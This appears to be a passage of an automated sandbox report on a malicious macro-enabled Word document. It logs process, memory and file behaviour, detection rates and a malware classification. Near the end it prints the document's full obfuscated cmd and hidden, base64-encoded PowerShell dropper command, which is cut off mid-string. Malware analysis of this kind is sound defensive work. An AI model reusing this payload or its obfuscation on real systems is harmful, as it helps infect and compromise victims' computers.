                      Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76E20000 page execute and read and writeJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76D20000 page execute and read and writeJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76E20000 page execute and read and writeJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76D20000 page execute and read and writeJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76E20000 page execute and read and writeJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76D20000 page execute and read and writeJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76E20000 page execute and read and writeJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76D20000 page execute and read and writeJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76E20000 page execute and read and write
                      Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76D20000 page execute and read and write
                      Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76E20000 page execute and read and write
                      Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76D20000 page execute and read and write
                      Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Windows\SysWOW64\Lahhvjcxlgt\Jump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_10017D7D7_2_10017D7D
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_100189F67_2_100189F6
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_100076057_2_10007605
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_1000620A7_2_1000620A
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_1001F4117_2_1001F411
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_1000F8137_2_1000F813
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_1000D0137_2_1000D013
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_100088167_2_10008816
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_1000421E7_2_1000421E
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_1001C4247_2_1001C424
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_100026287_2_10002628
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_10004A2B7_2_10004A2B
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_1000DC2F7_2_1000DC2F
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_100188317_2_10018831
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_10007E347_2_10007E34
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_1000A83A7_2_1000A83A
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_1000903F7_2_1000903F
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_10014E4B7_2_10014E4B
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_1000704B7_2_1000704B
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_1000D44C7_2_1000D44C
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_1001C04C7_2_1001C04C
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_100058567_2_10005856
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_100016587_2_10001658
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_100112597_2_10011259
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_100186687_2_10018668
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_1000C07D7_2_1000C07D
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_100146937_2_10014693
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_1001CAA07_2_1001CAA0
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_10004EA17_2_10004EA1
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_10008CA37_2_10008CA3
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_1001C6AD7_2_1001C6AD
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_100056B37_2_100056B3
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_10015AB87_2_10015AB8
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_10005EB97_2_10005EB9
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_100106C27_2_100106C2
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_10009CC87_2_10009CC8
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_1001D2CB7_2_1001D2CB
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_1000D0DE7_2_1000D0DE
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_10009AE17_2_10009AE1
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_100142E27_2_100142E2
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_1001DEE87_2_1001DEE8
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_100094EC7_2_100094EC
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_1000C6EF7_2_1000C6EF
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_1000CF117_2_1000CF11
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_100151157_2_10015115
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_1001231B7_2_1001231B
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_1001BF257_2_1001BF25
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_1001DB257_2_1001DB25
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_1000492A7_2_1000492A
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_1001D5307_2_1001D530
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_1000213E7_2_1000213E
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_1000CB427_2_1000CB42
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_10016B457_2_10016B45
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_1001654F7_2_1001654F
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_10003D4E7_2_10003D4E
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_10018F657_2_10018F65
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_100129657_2_10012965
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_1001676B7_2_1001676B
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_10010F6D7_2_10010F6D
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_10011B717_2_10011B71
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_100175707_2_10017570
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_1000A1767_2_1000A176
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_1001DD787_2_1001DD78
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_10013D7C7_2_10013D7C
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_1001E19F7_2_1001E19F
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_100199A47_2_100199A4
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_10015DAA7_2_10015DAA
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_1001EDB97_2_1001EDB9
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_10006BC07_2_10006BC0
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_100173C07_2_100173C0
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_100177C07_2_100177C0
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_10019DC07_2_10019DC0
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_100193C97_2_100193C9
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_1001CDCC7_2_1001CDCC
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_1000ADCE7_2_1000ADCE
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_1001B1D27_2_1001B1D2
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_10004BDE7_2_10004BDE
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_10005BE17_2_10005BE1
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_10002DEE7_2_10002DEE
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_100137F47_2_100137F4
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_1001B3FE7_2_1001B3FE
                      Source: ARCHIVOFile-20-012021.docOLE, VBA macro line: Private Sub Document_open()
                      Source: VBA code instrumentationOLE, VBA macro: Module Bcur5699z4d, Function Document_openName: Document_open
                      Source: ARCHIVOFile-20-012021.docOLE indicator, VBA macros: true
                      Source: ARCHIVOFile-20-012021.docOLE indicator application name: unknown
                      Source: powershell.exe, 00000005.00000002.2111959745.000000001CC80000.00000002.00000001.sdmp, rundll32.exe, 00000006.00000002.2116032570.0000000001B70000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2113937687.0000000001F10000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2124432058.0000000001D10000.00000002.00000001.sdmpBinary or memory string: .VBPud<_
                      Source: classification engineClassification label: mal100.troj.evad.winDOC@32/14@6/100
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\Desktop\~$CHIVOFile-20-012021.docJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: \Sessions\1\BaseNamedObjects\Global\.net clr networking
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Temp\CVRBF1A.tmpJump to behavior
                      Source: ARCHIVOFile-20-012021.docOLE indicator, Word Document stream: true
                      Source: ARCHIVOFile-20-012021.docOLE document summary: title field not present or empty
                      Source: ARCHIVOFile-20-012021.docOLE document summary: author field not present or empty
                      Source: ARCHIVOFile-20-012021.docOLE document summary: edited time not present or 0
                      Source: C:\Windows\System32\msg.exeConsole Write: ........................................ .A.......A.....................H...............#...............................h.......5kU.............Jump to behavior
                      Source: C:\Windows\System32\msg.exeConsole Write: ................(...............A.s.y.n.c. .m.e.s.s.a.g.e. .s.e.n.t. .t.o. .s.e.s.s.i.o.n. .C.o.n.s.o.l.e...............L.......................Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................................................`I.........v.....................K........k.............................Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....................;@.j......................{.............}..v....X.......0...............................(...............Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....................;@.j..... {...............{.............}..v............0.................k.............(...............Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.....................C.j......n...............{.............}..v............0...............................(...............Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................E.i......................C.j......k...............{.............}..v....H.......0.................k.............(...............Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....#...............KC.j......................{.............}..v....p.......0...............................(...............Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....#...............KC.j..... {...............{.............}..v............0...............h.k.............(...............Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....7..................j.....Mk...............{.............}..v............0...............................(...............Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....7..................j....P.................{.............}..v............0................Jk.............(...............Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....C..................j.....Mk...............{.............}..v............0...............................(...............Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....C..................j....P.................{.............}..v............0................Jk.............(...............Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....O..................j.....Mk...............{.............}..v............0...............................(...............Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....O..................j....P.................{.............}..v............0................Jk.............(...............Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....[.......e.s. .a.r.e. .".S.s.l.3.,. .T.l.s."...".........}..v............0...............8Jk.....(.......(...............Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....[..................j......................{.............}..v.... .......0................Jk.............(...............Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....g.......A.t. .l.i.n.e.:.1. .c.h.a.r.:.4.8.4.............}..v....0.......0...............8Jk.....$.......(...............Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....g..................j......................{.............}..v....h.......0................Jk.............(...............Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....s..................j.....Mk...............{.............}..v....0.......0...............................(...............Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....s..................j......................{.............}..v....h.......0................Jk.............(...............Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j.....Mk...............{.............}..v....0.......0...............................(...............Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j......................{.............}..v....h.......0................Jk.............(...............Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j.....Mk...............{.............}..v....0.......0...............................(...............Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j......................{.............}..v....h.......0................Jk.............(...............Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j.....Mk...............{.............}..v....0.......0...............................(...............Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j......................{.............}..v....h.......0................Jk.............(...............Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j.....Mk...............{.............}..v....0.......0...............................(...............Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j......................{.............}..v....h.......0................Jk.............(...............Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j.....Mk...............{.............}..v....0.......0...............................(...............Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j......................{.............}..v....h.......0................Jk.............(...............Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j.....Mk...............{.............}..v....0.......0...............................(...............Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j......................{.............}..v....h.......0................Jk.............(...............Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j.....Mk...............{.............}..v....0.......0...............................(...............Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j......................{.............}..v....h.......0................Jk.............(...............Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j.....Mk...............{.............}..v....0.......0...............................(...............Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j......................{.............}..v....h.......0................Jk.............(...............Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j.....Mk...............{.............}..v....0.......0...............................(...............Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j......................{.............}..v....h.......0................Jk.............(...............Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j.....Mk...............{.............}..v....0.......0...............................(...............Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j......................{.............}..v....h ......0................Jk.............(...............Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j.....Mk...............{.............}..v....0'......0...............................(...............Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j.....'................{.............}..v....h(......0................Jk.............(...............Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j.....Mk...............{.............}..v....0/......0...............................(...............Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j...../................{.............}..v....h0......0................Jk.............(...............Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j.....Mk...............{.............}..v....07......0...............................(...............Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j.....7................{.............}..v....h8......0................Jk.............(...............Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j.....Mk...............{.............}..v....0?......0...............................(...............Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j.....?................{.............}..v....h@......0................Jk.............(...............Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....'..................j.....Mk...............{.............}..v....0G......0...............................(...............Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....'..................j.....G................{.............}..v....hH......0................Jk.............(...............Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....3..................j.....Mk...............{.............}..v....0O......0...............................(...............Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....3..................j.....O................{.............}..v....hP......0................Jk.............(...............Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....?..................j.....Mk...............{.............}..v....0W......0...............................(...............Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....?..................j.....W................{.............}..v....hX......0................Jk.............(...............Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....K..................j.....Mk...............{.............}..v....0_......0...............................(...............Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....K..................j....._................{.............}..v....h`......0................Jk.............(...............Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....W..................j.....Mk...............{.............}..v....0g......0...............................(...............Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....W..................j.....g................{.............}..v....hh......0................Jk.............(...............Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....c..................j.....Mk...............{.............}..v....0o......0...............................(...............Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....c..................j.....o................{.............}..v....hp......0................Jk.............(...............Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....o..................j.....Mk...............{.............}..v....0w......0...............................(...............Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....o..................j.....w................{.............}..v....hx......0................Jk.............(...............Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....{..................j.....Mk...............{.............}..v....0.......0...............................(...............Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....{..................j......................{.............}..v....h.......0................Jk.............(...............Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j.....Mk...............{.............}..v....0.......0...............................(...............Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j......................{.............}..v....h.......0................Jk.............(...............Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j.....Mk...............{.............}..v....0.......0...............................(...............Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j......................{.............}..v....h.......0................Jk.............(...............Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j.....Mk...............{.............}..v....0.......0...............................(...............Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j......................{.............}..v....h.......0................Jk.............(...............Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j.....Mk...............{.............}..v............0...............................(...............Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j......................{.............}..v....8.......0................Jk.............(...............Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j.....Mk...............{.............}..v............0...............................(...............Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j......................{.............}..v............0................Jk.............(...............Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j.....Mk...............{.............}..v....h.......0.......................r.......(...............Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j.... .................{.............}..v............0................Jk.............(...............Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v............ ..........j.....Mk...............{.............}..v....0.......0...............8Jk.............(...............Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j......................{.............}..v....h.......0................Jk.............(...............Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.....................~.j.....(................{.............}..v......".....0.................k.............(...............Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.....................~.j.....(................{.............}..v....@S".....0.................k.............(...............Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v2.0.50727_64\mscorlib\fe6ac93181b40a571892e14bfb9d65f2\mscorlib.ni.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlpJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlpJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEWMI Queries: IWbemServices::ExecMethod - Win32_Process::Create
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile read: C:\Users\desktop.iniJump to behavior
                      Source: C:\Windows\System32\msg.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeFile read: C:\Windows\System32\drivers\etc\hosts
                      Source: C:\Windows\SysWOW64\rundll32.exeFile read: C:\Windows\System32\drivers\etc\hosts
                      Source: unknownProcess created: C:\Windows\System32\rundll32.exe 'C:\Windows\system32\rundll32.exe' C:\Users\user\Vlj0ta0\Mtkd4y0\O8_N.dll ShowDialogA
                      Source: ARCHIVOFile-20-012021.docVirustotal: Detection: 48%
                      Source: ARCHIVOFile-20-012021.docReversingLabs: Detection: 50%
                      Source: unknownProcess created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE 'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding
                      Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd cmd /c m^s^g %username% /v Wo^rd exp^erien^ced an er^ror tryi^ng to op^en th^e fi^le. & p^owe^rs^he^ll^ -w hi^dd^en -^e^nc IAAgAFMARQBUAC0AaQBUAGUATQAgACAAdgBhAHIASQBhAEIATABFADoAUABHAEIAIAAgACgAIABbAFQAWQBQAGUAXQAoACIAewAyAH0AewA0AH0AewA1AH0AewAxAH0AewAwAH0AewAzAH0AIgAgAC0AZgAnAC4ARABpAHIAJwAsACcAbQAuAEkATwAnACwAJwBTAHkAJwAsACcARQBDAFQAbwBSAHkAJwAsACcAUwB0ACcALAAnAEUAJwApACkAOwAgAHMARQBUACAAKAAnADIAOQB4ACcAKwAnAGQAJwArACcANABNACcAKQAgACAAKAAgAFsAVABZAHAARQBdACgAIgB7ADcAfQB7ADEAfQB7ADIAfQB7ADMAfQB7ADYAfQB7ADQAfQB7ADAAfQB7ADUAfQAiACAALQBmACcATgBhACcALAAnAHkAcwAnACwAJwBUAGUATQAuAE4ARQB0ACcALAAnAC4AUwBFAHIAVgBpACcALAAnAGUAUABPAGkAbgBUAG0AQQAnACwAJwBHAGUAUgAnACwAJwBDACcALAAnAHMAJwApACAAIAApADsAJABYAGoAYgA2AHUAdQA5AD0AJABTAF8ANwBXACAAKwAgAFsAYwBoAGEAcgBdACgANgA0ACkAIAArACAAJABDADkANgBaADsAJABBADIAOQBZAD0AKAAoACcAVAAnACsAJwA2ADUAJwApACsAJwBRACcAKQA7ACAAIAAkAHAAZwBCADoAOgAiAGMAcgBgAEUAYQBUAGAAZQBEAEkAcgBgAEUAYwB0AGAAbwBSAHkAIgAoACQASABPAE0ARQAgACsAIAAoACgAJwBkAGIAJwArACgAJwB6AFYAbAAnACsAJwBqADAAdABhADAAZAAnACkAKwAnAGIAegAnACsAKAAnAE0AJwArACcAdABrAGQANAAnACsAJwB5ADAAJwApACsAKAAnAGQAYgAnACsAJwB6ACcAKQApAC4AIgByAGAARQBgAFAATABBAGMAZQAiACgAKABbAGMASABhAFIAXQAxADAAMAArAFsAYwBIAGEAUgBdADkAOAArAFsAYwBIAGEAUgBdADEAMgAyACkALAAnAFwAJwApACkAKQA7ACQAWAAxADMASAA9ACgAKAAnAFQAJwArACcANgA2ACcAKQArACcATAAnACkAOwAgACAAKABWAGEAUgBpAEEAQgBMAGUAIAAoACcAMgA5AHgAJwArACcAZAAnACsAJwA0AE0AJwApACAAKQAuAFYAQQBMAHUAZQA6ADoAIgBTAGUAQwBVAFIAYABJAFQAWQBgAFAAYABSAGAATwBUAE8AQwBPAEwAIgAgAD0AIAAoACcAVABsACcAKwAoACcAcwAnACsAJwAxADIAJwApACkAOwAkAEUAMwA0AFEAPQAoACgAJwBRAF8AJwArACcAMQAnACkAKwAnAEwAJwApADsAJABJADMAbABhAGEAMgAzACAAPQAgACgAKAAnAE8AOAAnACsAJwBfACcAKQArACcATgAnACkAOwAkAFcAOQA2AFkAPQAoACgAJwBQACcAKwAnADUAMQAnACkAKwAnAEQAJwApADsAJABJAHEANgByAGYAZwAwAD0AJABIAE8ATQBFACsAKAAoACgAJwBvACcAKwAnADYAbgBWACcAKQArACgAJwBsAGoAMAB0ACcAKwAnAGEAMABvACcAKQArACcANgBuACcAKwAnAE0AdAAnACsAKAAnAGsAZAAnACsAJwA0ACcAKQArACgAJwB5ACcAKwAnADAAbwA2ACcAKQArACcAbgAnACkALQBjAHIARQBQAGwAQQBDAEUA